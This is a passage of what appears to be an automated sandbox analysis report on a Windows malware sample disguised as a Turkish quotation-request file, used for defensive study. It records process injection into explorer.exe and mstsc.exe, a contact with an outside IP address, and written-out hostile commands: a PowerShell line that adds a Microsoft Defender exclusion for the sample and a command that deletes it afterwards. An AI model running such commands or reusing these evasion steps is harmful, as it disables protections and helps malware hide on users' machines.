          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe Code function: 4_2_01BC89B3 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe Code function: 4_2_01C0A9D3 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe Code function: 4_2_01B529A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe Code function: 4_2_01B409AD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe Code function: 4_2_01B729F9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe Code function: 4_2_01BCE9E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe Code function: 4_2_01B4A9D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe Code function: 4_2_01B749D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe Code function: 4_2_01BD69C0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe Code function: 4_2_01BC892A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe Code function: 4_2_01BD892B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe Code function: 4_2_01B38918 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe Code function: 4_2_01BCC912 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe Code function: 4_2_01BBE908 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe Code function: 4_2_01BCC97C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe Code function: 4_2_01BE4978 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe Code function: 4_2_01B66962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe Code function: 4_2_01B8096E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe Code function: 4_2_01B8096E mov edx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe Code function: 4_2_01BC0946 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe Code function: 4_2_01BCC89D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe Code function: 4_2_01C0A8E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe Code function: 4_2_01B40887 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe Code function: 4_2_01B7C8F9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe Code function: 4_2_01B6E8C0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe Code function: 4_2_01B62835 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe Code function: 4_2_01B62835 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe Code function: 4_2_01BE483A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe Code function: 4_2_01B7A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe Code function: 4_2_01BCC810 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe Code function: 4_2_01BD6870 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe Code function: 4_2_01BCE872 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe Code function: 4_2_01B70854 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe Code function: 4_2_01B44859 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe Code function: 4_2_01B52840 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe Code function: 4_2_01B50BBE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe Code function: 4_2_01BF4BB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe Code function: 4_2_01B48BF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe Code function: 4_2_01B6EBFC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe Code function: 4_2_01BCCBF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe Code function: 4_2_01BEEBD0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe Code function: 4_2_01B40BCD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe Code function: 4_2_01B60BCB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe Code function: 4_2_01C0AB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe Code function: 4_2_01B6EB20 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe Code function: 4_2_01BBEB1D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe Code function: 4_2_01B3CB7E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe Code function: 4_2_01C08B28 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe Code function: 4_2_01BEEB50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe Code function: 4_2_01BF4B4B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe Code function: 4_2_01BE8B42 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe Code function: 4_2_01BD6B40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe Code function: 4_2_01B48AA0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe Code function: 4_2_01B96AA4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe Code function: 4_2_01B78A90 mov edx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe Code function: 4_2_01B4EA80 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe Code function: 4_2_01C14A80 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe Code function: 4_2_01B7AAEE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe Code function: 4_2_01B40AD0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe Code function: 4_2_01B74AD0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe Code function: 4_2_01B96ACC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe Code function: 4_2_01B64A35 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe Code function: 4_2_01B7CA38 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe Code function: 4_2_01B7CA24 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe Code function: 4_2_01B6EA2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe Code function: 4_2_01BCCA11 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe Code function: 4_2_01BBCA72 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe Code function: 4_2_01B7CA6F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe Code function: 4_2_01BEEA60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe Code function: 4_2_01B46A50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe Code function: 4_2_01B50A5B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe Code function: 4_2_01B7CDB1 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe Code function: 4_2_01B7CDB1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe Code function: 4_2_01B68DBF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe Code function: 4_2_01B76DA0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe Code function: 4_2_01B36DF6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 8_2_00800B1F GetLastError,SetLastError,GetProcessHeap,HeapFree
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe Process token adjusted: Debug
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 8_2_00888847 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe Memory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion

          Source: C:\Windows\explorer.exe Network Connect: 185.26.122.70 80
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe"
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe NtQueueApcThread: Indirect: 0x16AA4F2
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe NtClose: Indirect: 0x16AA56C
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe Memory written: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe base: 400000 value starts with: 4D5A
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe Section loaded: NULL target: C:\Windows\SysWOW64\mstsc.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\mstsc.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\mstsc.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe Thread register set: target process: 4084
          Source: C:\Windows\SysWOW64\mstsc.exe Thread register set: target process: 4084
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe Thread APC queued: target process: C:\Windows\explorer.exe
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe Section unmapped: C:\Windows\SysWOW64\mstsc.exe base address: 770000
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe"
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe Process created: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe "C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe"
          Source: C:\Windows\SysWOW64\mstsc.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe"
          Source: explorer.exe, 00000006.00000002.2809525742.00000000044D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1558708062.0000000001091000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.1569063480.000000000936E000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000006.00000002.2806086310.0000000000A20000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1558708062.0000000001091000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.1558305296.0000000000A20000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Progman
          Source: explorer.exe, 00000006.00000000.1558708062.0000000001091000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000002.2806908050.0000000001090000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: 0Program Manager
          Source: explorer.exe, 00000006.00000000.1558708062.0000000001091000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000002.2806908050.0000000001090000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
          Source: explorer.exe, 00000006.00000000.1569063480.000000000936E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2817331144.000000000937B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2285702031.0000000009378000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Shell_TrayWnd]1Q
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 8_2_008865E0 GetLocaleInfoW,wcsncmp
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe Queries volume information: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe VolumeInformation
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 8_2_00887751 GetSystemTime,SystemTimeToFileTime,GetLastError,8_2_00887751
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 8_2_00812831 GetUserNameExW,GetLastError,GetLastError,GetUserNameExW,GetLastError,SetLastError,LoadLibraryExW,GetLastError,GetProcAddress,GetLastError,NetApiBufferFree,FreeLibrary,8_2_00812831
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 8_2_008092B6 memset,GetVersionExW,GetLastError,GetLastError,8_2_008092B6
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information

Source: Yara match | File source: 4.2.TEKL#U0130F #U0130ST.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.TEKL#U0130F #U0130ST.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.TEKL#U0130F #U0130ST.exe.4baf778.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000004.00000002.1623354480.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1554836023.0000000004189000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.2806521590.00000000048D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.2805964645.00000000029B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.2806583506.0000000004900000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1554836023.00000000049DD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

          Remote Access Functionality

Source: Yara match | File source: 4.2.TEKL#U0130F #U0130ST.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.TEKL#U0130F #U0130ST.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.TEKL#U0130F #U0130ST.exe.4baf778.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000004.00000002.1623354480.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1554836023.0000000004189000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.2806521590.00000000048D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.2805964645.00000000029B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.2806583506.0000000004900000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1554836023.00000000049DD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 8_2_008144EC LocalAlloc,CreateWellKnownSid,GetLastError,RpcBindingSetAuthInfoExW,LocalFree,RpcBindingFree,8_2_008144EC
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 8_2_008185B1 RpcStringBindingComposeW,RpcBindingFromStringBindingW,RpcStringFreeW,8_2_008185B1
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 8_2_0081873B RpcBindingSetAuthInfoExW,LocalFree,RpcBindingSetAuthInfoExW,RpcBindingFree,8_2_0081873B
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 8_2_007E8C82 socket,setsockopt,bind,setsockopt,setsockopt,setsockopt,listen,WSAEventSelect,WSAEventSelect,8_2_007E8C82
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 8_2_00813E64 memset,GetCurrentProcessId,ProcessIdToSessionId,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,RpcBindingFree,8_2_00813E64
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Native API | 1 DLL Side-Loading | 1 Abuse Elevation Control Mechanism | 11 Disable or Modify Tools | 1 Credential API Hooking | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | 2 Ingress Tool Transfer | Exfiltration Over Other Network Medium | Abuse Accessibility Features
